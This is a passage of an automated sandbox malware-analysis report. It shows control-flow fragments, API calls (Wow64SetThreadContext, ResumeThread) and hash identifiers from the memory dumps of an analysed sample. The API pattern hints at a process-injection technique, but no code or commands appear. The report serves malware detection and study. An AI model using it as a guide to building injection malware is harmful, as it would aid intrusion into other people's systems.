                        • Opcode Fuzzy Hash: 95130e74039486a189e3f2e5fadb36820010834d309246459c43bcdfd3738962
                        • Instruction Fuzzy Hash: 9241A9B4D002589FCF10CFA9D980AEEFBB1BB49310F20942AE814B7300D735A945CF65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 432 17dbb8-17dc20 435 17dc37-17dc85 Wow64SetThreadContext 432->435 436 17dc22-17dc34 432->436 438 17dc87-17dc8d 435->438 439 17dc8e-17dcda 435->439 436->435 438->439
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017DC6F
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID: eC>
                        • API String ID: 983334009-2138442192
                        • Opcode ID: 2bdc3148a4240f196b538b3f16a7253b0b5eda1830e2d40cb8efb11823814b4a
                        • Instruction ID: f2cdbf656cbb5b6c18936db406ed3a10e63e100d5fdc0be3c1653dbc74ebc859
                        • Opcode Fuzzy Hash: 2bdc3148a4240f196b538b3f16a7253b0b5eda1830e2d40cb8efb11823814b4a
                        • Instruction Fuzzy Hash: 9D41BCB5D002589FCF10CFA9D984AEEFBF1AF49314F24802AE418B7240D778A989CF54

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 444 17dbc0-17dc20 446 17dc37-17dc85 Wow64SetThreadContext 444->446 447 17dc22-17dc34 444->447 449 17dc87-17dc8d 446->449 450 17dc8e-17dcda 446->450 447->446 449->450
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017DC6F
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID: eC>
                        • API String ID: 983334009-2138442192
                        • Opcode ID: 9492741bf67b9c811bec8b496dce390a4ca11738551e0c6dcf52b2b7e7ac9bae
                        • Instruction ID: 8cfdc0a13447706ef48bae6196099ddc769580ef4ccc5741a6f6c27e0c953c69
                        • Opcode Fuzzy Hash: 9492741bf67b9c811bec8b496dce390a4ca11738551e0c6dcf52b2b7e7ac9bae
                        • Instruction Fuzzy Hash: A041ACB5D0025C9FCF10CFA9D984AEEFBB1AF49314F24842AE418B7240D778A945CF54

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 455 17dac9-17db64 ResumeThread 459 17db66-17db6c 455->459 460 17db6d-17dbaf 455->460 459->460
                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 0017DB4E
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID: eC>
                        • API String ID: 947044025-2138442192
                        • Opcode ID: 4ff0c0bf33a83fc0961443166aa7978d570828cff077df1fc94c125661189763
                        • Instruction ID: 92a0b0c9b22cb51a801e8471c20764b22804816aa493f03f6845bf9b3ae4ee27
                        • Opcode Fuzzy Hash: 4ff0c0bf33a83fc0961443166aa7978d570828cff077df1fc94c125661189763
                        • Instruction Fuzzy Hash: 7131BDB4D002189FCF14CFA9E984AEEFBB5AF49314F24942AE819B7300D735A945CF94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 465 17dad0-17db64 ResumeThread 468 17db66-17db6c 465->468 469 17db6d-17dbaf 465->469 468->469
                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 0017DB4E
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID: eC>
                        • API String ID: 947044025-2138442192
                        • Opcode ID: 2bb2eb79767daf54fecc1b80d08ff30ec5f1ba7701d399eb824a0ff23e93bbfe
                        • Instruction ID: f3b2c353b4129c6736d32877e994fc180596b87088bdb4fe832989a36c9143d2
                        • Opcode Fuzzy Hash: 2bb2eb79767daf54fecc1b80d08ff30ec5f1ba7701d399eb824a0ff23e93bbfe
                        • Instruction Fuzzy Hash: C931CDB4D002189FCF14CFA9E984AEEFBB5AF49314F24942AE819B7300D735A905CF94
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID: (
                        • API String ID: 0-3887548279
                        • Opcode ID: 6eda8cc7d39c28f58ec3c37788a11e85c97fe7e2f971488307b7d8add0854c4e
                        • Instruction ID: 7bdf6bc05f7714a6a19a209fcbacb85115c72b0b22705ff1c292490f02130f84
                        • Opcode Fuzzy Hash: 6eda8cc7d39c28f58ec3c37788a11e85c97fe7e2f971488307b7d8add0854c4e
                        • Instruction Fuzzy Hash: BC01F63590A268CFEB60CFA4CD44BEDBBB9BB49305F1452D9D509A7291C336AE85CF10
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cda5c59ee1ee26dafaeffbe92f6a554036eb802f217c5771b15527e89c2027f0
                        • Instruction ID: 4b2913eeff97f7ec6d9bf79f79a9df4b689b95a7fddd10095f15b053f4116705
                        • Opcode Fuzzy Hash: cda5c59ee1ee26dafaeffbe92f6a554036eb802f217c5771b15527e89c2027f0
                        • Instruction Fuzzy Hash: FE612B75909229CFDBA4CF54D844BECBBB5BB09301F1081EADA0DA3295DB31AAC5CF50
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34d37998bd020af895e7e1985fe72983a25a9a13a146c724cd161af7a83958dc
                        • Instruction ID: 1c4eedc338a33b1b2c0a4b27ecebc8594aa6ee5674d65c403d85b22cf1f15cda
                        • Opcode Fuzzy Hash: 34d37998bd020af895e7e1985fe72983a25a9a13a146c724cd161af7a83958dc
                        • Instruction Fuzzy Hash: D2412775D4921ACFDBA4CF95C840BECB7B5BF89301F1092A6DA0DA2245EB716AC5CF40
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a017ee16a07b3221706a76b3ec89aab4210ce6cef184c698b049a86d338fd4bb
                        • Instruction ID: 3657c88be1dfd9cb1f63e6fe7c026c3ac83c39f742aa47e6d3bf5c1275c63f75
                        • Opcode Fuzzy Hash: a017ee16a07b3221706a76b3ec89aab4210ce6cef184c698b049a86d338fd4bb
                        • Instruction Fuzzy Hash: C341E775D4921ACFDBA4CF65C840BECBBB5BF59300F1092A6D60DA6244EB716AC5CF40
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 228436a175ffb3f55f76cf0f5d887e4939cde2428f96e4ce23ec11c2a7b0a2fe
                        • Instruction ID: 4ce64d39af8b59918e747137890099fb5424734b04dd3a88ad8b9d5f308953e9
                        • Opcode Fuzzy Hash: 228436a175ffb3f55f76cf0f5d887e4939cde2428f96e4ce23ec11c2a7b0a2fe
                        • Instruction Fuzzy Hash: 2741F875D4525ACFDBA4CF54C840BE8BBB5BF59300F1082E6D609A7244EB716AC5CF40
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02688c5c20277630b13fc66754fb556eee65a98d32cde8b0556d1d2ff9e40b56
                        • Instruction ID: 611b70d539c5a395d32503d8413a34b8fbe3a7ad1223150efbfc78c43abc4433
                        • Opcode Fuzzy Hash: 02688c5c20277630b13fc66754fb556eee65a98d32cde8b0556d1d2ff9e40b56
                        • Instruction Fuzzy Hash: 5121AFB5604340AFDB25DF24D884B26BFA5EB84314F24C56BE8494B346C336D84ACBB1
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1424be14df7d630648e3d90623704b3438236d6b1a4cdb6bde149d881d162d0
                        • Instruction ID: 4676ed8466ffa1aaa0c382fb1a5e72b8da5d5ed02d7fc65c5d6d6dfffe188e7d
                        • Opcode Fuzzy Hash: e1424be14df7d630648e3d90623704b3438236d6b1a4cdb6bde149d881d162d0
                        • Instruction Fuzzy Hash: 8621AFB5604340AFDB55CF14D980B26BBA5EB94314F24C5ABE8494B356C336D846CB61
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4902fddaa9b1baacf4630680d11b7c7e935e0573d7bba9ea49814211300c6f84
                        • Instruction ID: bfc90ff0abd6077d3a94f4e8130be88d7da0e6a7c770f62ae3e317942078ee3d
                        • Opcode Fuzzy Hash: 4902fddaa9b1baacf4630680d11b7c7e935e0573d7bba9ea49814211300c6f84
                        • Instruction Fuzzy Hash: 60216F755093808FDB12CF24D994715BFB1EB86314F28C5EBD8498B697C33AD84ACB62
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4f2d736033546b9e8ea3d941445f431cf8d8051144942278316bd618007b00e
                        • Instruction ID: caad61b12af7b709e1dcb115f55edd6fdf4be316ec6fca3db0be9f4372ce7801
                        • Opcode Fuzzy Hash: e4f2d736033546b9e8ea3d941445f431cf8d8051144942278316bd618007b00e
                        • Instruction Fuzzy Hash: BE211779D08228CFDFA0CF64D8447EDBBB5AF4A305F144099D64AA3251DB326A86CF41
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                        • Instruction ID: e380d15482013e35632295978a9d365b9fef28a8c9ff2bbf4d6be0dfcec7b39c
                        • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                        • Instruction Fuzzy Hash: 04118B75904280DFDB52CF14D9C4B25BBA1FB94314F28C6AED8494B756C33AD84ACBA1
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73ba1bb68b3f17e539c37f317dfaed6c4ec4663b30dcbee9515f0a1ad499de2f
                        • Instruction ID: 4bcdf466ce57e059fbe825f6fea94de78b32ff7ecac929dc1944f1bdf2e423f2
                        • Opcode Fuzzy Hash: 73ba1bb68b3f17e539c37f317dfaed6c4ec4663b30dcbee9515f0a1ad499de2f
                        • Instruction Fuzzy Hash: 9311C5B4D0520ADFDB84DFA9D5456AEBFF1FB89300F1491AAD919A3304EB304A41CF91
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3cf0e6f9dbd9adb5ce04dc89448b29f3d090accb178169bab2255a2e33aa0499
                        • Instruction ID: 18bed0220143866f184f1849a3f5aa40cf1e0b8c0bdc655f32cbae4583ab43c0
                        • Opcode Fuzzy Hash: 3cf0e6f9dbd9adb5ce04dc89448b29f3d090accb178169bab2255a2e33aa0499
                        • Instruction Fuzzy Hash: 371193B8D0420ADFDB84DFA9D5456AEBFF1BB88300F1491AAD919E3304EB344A41CF91
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 60ed61bc569799252c6661aa03d11c02b7cff1a6e025892204329188897a90d0
                        • Instruction ID: dfe570bb945a74397c9e35e1c0c5c94b908a09559afeb6b9a4625f63a0c2a8ee
                        • Opcode Fuzzy Hash: 60ed61bc569799252c6661aa03d11c02b7cff1a6e025892204329188897a90d0
                        • Instruction Fuzzy Hash: 8811B3B8D0420ADFDB84DFA9D5456AEBBF5FB88300F1491AAD919E3304EB305A41CF91
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f79c922a6b9553d51b4b6fc4cc4a361d45c64666f82a95a8ab6f05dda2b1b9dc
                        • Instruction ID: ac0ce42561c977339a0be5d826bffb16645d94741dcf869b2d9e2aaed13343c3
                        • Opcode Fuzzy Hash: f79c922a6b9553d51b4b6fc4cc4a361d45c64666f82a95a8ab6f05dda2b1b9dc
                        • Instruction Fuzzy Hash: B4115AB0808218EFCB61DF28C8807D9BBB4FB4A301F0486D9C51DD6245C775AA85CF50
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5fb4b8c9c761b309eea782892178fee7b073b16a1c50dd7ae67fde1644c13e6a
                        • Instruction ID: ebe9624fc9e59a693e8a0849e678a9a34f2e0f0a9d39290705faa31baf9d3dfc
                        • Opcode Fuzzy Hash: 5fb4b8c9c761b309eea782892178fee7b073b16a1c50dd7ae67fde1644c13e6a
                        • Instruction Fuzzy Hash: 33016D35818224CFDB64CF64D8147ECBBB1BB09311F0442EA8A0EA2390C731AAC5CF10
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31536bfb1f04de9dcedaa1a37a8290a4ddd480df26903f773bf646faffcf0755
                        • Instruction ID: 431b68f9a1b4fc6f1b581f86ceef28c534cb7d69b1eb9a20f8f65b4689e2da11
                        • Opcode Fuzzy Hash: 31536bfb1f04de9dcedaa1a37a8290a4ddd480df26903f773bf646faffcf0755
                        • Instruction Fuzzy Hash: B7F0B470C05304EFDB54DFA5D8945ACBBB4BB4A311F1496AAD809D3285EF350500CF01
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38c387edff75aa7d6a95c641041da97540a7302aee3307fccda561dd98c676d0
                        • Instruction ID: 1483add762d3ffef75ec5d82d840aecd946fe22f52108999f947a0b27bdda35b
                        • Opcode Fuzzy Hash: 38c387edff75aa7d6a95c641041da97540a7302aee3307fccda561dd98c676d0
                        • Instruction Fuzzy Hash: 2AF05E71D01308EFDB58DFA9D9846ACBBB5BB8A315F1496AAD919E3284DB350A00CF00
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4d393fefa1f52efccad0a3cdef6affa94eae1a0bf4da82a23213b95fa550c37e
                        • Instruction ID: 05e5a25c74f5205e08fd69e41faed6b1329deb5c180e2aa73272b86886b446dd
                        • Opcode Fuzzy Hash: 4d393fefa1f52efccad0a3cdef6affa94eae1a0bf4da82a23213b95fa550c37e
                        • Instruction Fuzzy Hash: 97F06D70D05308EFD758DFA9E9846ADBBB8BB89301F1495AAD809E3344DF301A00CF40
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13e15ea747607b8e79f1167d850edcbde24e7b7a69c88580a1dc3d9ea430ac2c
                        • Instruction ID: 8b1884aa7c87989565fe27d95ff134df7174d61af4f0b50aa3c7f8c990386f02
                        • Opcode Fuzzy Hash: 13e15ea747607b8e79f1167d850edcbde24e7b7a69c88580a1dc3d9ea430ac2c
                        • Instruction Fuzzy Hash: 4BE0DF309AA208DFCB40CF64DC442FC7FB5EB47310F2011EADC0892211CA351E9AEB45
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b0d14779381f383ad5518252fe4647d87f060c15e4549080ad6183fb11f68ab
                        • Instruction ID: 143c83f8b11cd12550e688be5678b0d4937876ca1067c19d778dbf0501da6570
                        • Opcode Fuzzy Hash: 8b0d14779381f383ad5518252fe4647d87f060c15e4549080ad6183fb11f68ab
                        • Instruction Fuzzy Hash: 79F06D35909118CFDB24CF54C944BF8BBF5FB0A305F0841EAC80997256D731AA46CF10
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80c1d40cc90ae3610b1041944b8ca40bdd4dfa68f49642b1cbeb9280c27ecaa2
                        • Instruction ID: 390c49f8756b0e2951bafa2f28e94287b1a51eadf7da0bf3d13b5bfaf1dbcb1a
                        • Opcode Fuzzy Hash: 80c1d40cc90ae3610b1041944b8ca40bdd4dfa68f49642b1cbeb9280c27ecaa2
                        • Instruction Fuzzy Hash: 5BE04FB0C15249DFDF90EFB8D89429C7FF09B94220F2142BBDD2492391EA314A44CF61
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26317dd2b4d3aa3f7f70deec74866b309a0bb465146cab3866363b023dac36d7
                        • Instruction ID: 4718358afea96607d721a720a35f1dd5d675e6c0c9cdfe1627aa42fc27b01450
                        • Opcode Fuzzy Hash: 26317dd2b4d3aa3f7f70deec74866b309a0bb465146cab3866363b023dac36d7
                        • Instruction Fuzzy Hash: 22D05E70C9E208DBD704DFA8DD516BCBFBDAB46300F1051AADD4D23341CE312A46EA96
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a05f65f0e1d67fda7dfe77d72e0e3b8e6d18d1468d521f806a80dc2bffc6eaf7
                        • Instruction ID: 86d3be3337013943379081b69f18ecb6aac523483410e880cd7424a5f66de077
                        • Opcode Fuzzy Hash: a05f65f0e1d67fda7dfe77d72e0e3b8e6d18d1468d521f806a80dc2bffc6eaf7
                        • Instruction Fuzzy Hash: 3BE0C2B0C06204CFDB91FFB8A96031D7BB09F41601F5001EECD0852220E6358A64CB92
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af1d792bc6781231c4acf5be54b2ad2c8dc1f3274d12e53ce29bd2223012f0d7
                        • Instruction ID: dc02ff92e81cb219f382c5dbd96bbe30407e3340fa8e193dafb008dca23a795a
                        • Opcode Fuzzy Hash: af1d792bc6781231c4acf5be54b2ad2c8dc1f3274d12e53ce29bd2223012f0d7
                        • Instruction Fuzzy Hash: 4CE0E575904258DFDB44CF94CC80BE8B7B9AB48301F2480999509A7281C732AE85CF10
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55a35d9f2df8f72b882e020291f8b01fd584d00f9fc8ed01032c5ba99ee5d440
                        • Instruction ID: 7de4991fc314f8ab709d2f65fbdb9ea188d8a92ecfcb1aa82181c15aaf86d586
                        • Opcode Fuzzy Hash: 55a35d9f2df8f72b882e020291f8b01fd584d00f9fc8ed01032c5ba99ee5d440
                        • Instruction Fuzzy Hash: D2E08C70886348DFD3958BA89850AAC3BB49B82234F0502AEC4109B1E2E6690940CB21
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a90ae206dcc08f1c81c49c2810d77b08fd4e2306a1df2c185b52f74e2b4ec14a
                        • Instruction ID: 45ee18c6434811099024feb58e3d69a5eb7f6894e50dd7d863c23b98f64215a3
                        • Opcode Fuzzy Hash: a90ae206dcc08f1c81c49c2810d77b08fd4e2306a1df2c185b52f74e2b4ec14a
                        • Instruction Fuzzy Hash: A6D01770C162089EDB51FFB8A86679D7FB0DB41204F1042AACA0892691EA354A44CB82
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 601a0ecd2e785ab5deb1f151439ef5786356a026de9113391693c25916c842eb
                        • Instruction ID: 8935db4d901328ee51acdf6f73df7364c6d517f9b2ef4f127aa109e041828658
                        • Opcode Fuzzy Hash: 601a0ecd2e785ab5deb1f151439ef5786356a026de9113391693c25916c842eb
                        • Instruction Fuzzy Hash: 3BE0ECB0D11209DFDF94EFBCD98529DBFF0EB84220F2142BAD92592390E6314A80CF51
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7cf07879e9f14d076c54025508da927d7fceabf6e97bb6ef228a1b452257ea12
                        • Instruction ID: 7a486c7bdef2da2119560628ebd98d0e46ea7008fe34b046bd42f77f8c42342a
                        • Opcode Fuzzy Hash: 7cf07879e9f14d076c54025508da927d7fceabf6e97bb6ef228a1b452257ea12
                        • Instruction Fuzzy Hash: 6DE04F3540D2D09FCB81CB34CC983A4BFB05B42201F2884EE8489EA293D6395689CB01
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 21086554f41b9a7e5b84a6a45fe1323e297dab25363bc02a81e07b8fafd3b932
                        • Instruction ID: 72d1dbb826183d00ccd9ef79f050d4c0c6d41c63a6b73cf323e87f91b5db4637
                        • Opcode Fuzzy Hash: 21086554f41b9a7e5b84a6a45fe1323e297dab25363bc02a81e07b8fafd3b932
                        • Instruction Fuzzy Hash: B0D06770D11209EFDB84EFACE99579DBFF4AB44601F2041BADD4893350EA315B54CB91
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45d082ae9145265a7a5337cf8e4d2389b7b0b8c11d6620ebd4f5018ca7140829
                        • Instruction ID: c39823afd744eb88e8432ca208ca78709eb553974b88b9ed6ccc543d30d537f1
                        • Opcode Fuzzy Hash: 45d082ae9145265a7a5337cf8e4d2389b7b0b8c11d6620ebd4f5018ca7140829
                        • Instruction Fuzzy Hash: A1D0A930C0220CDBDB40FFBCE85575DBBB8EB00200F1001AACE0893240EA309A00CB92
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c37e7df1a3dd331efa7ebdcf69013382895961100b8a9b1ebd0acda6c725d0f1
                        • Instruction ID: c78840b042bbfe39941cca1469fa3a67c90dd00969fe9c7c50ea2c68602f4955
                        • Opcode Fuzzy Hash: c37e7df1a3dd331efa7ebdcf69013382895961100b8a9b1ebd0acda6c725d0f1
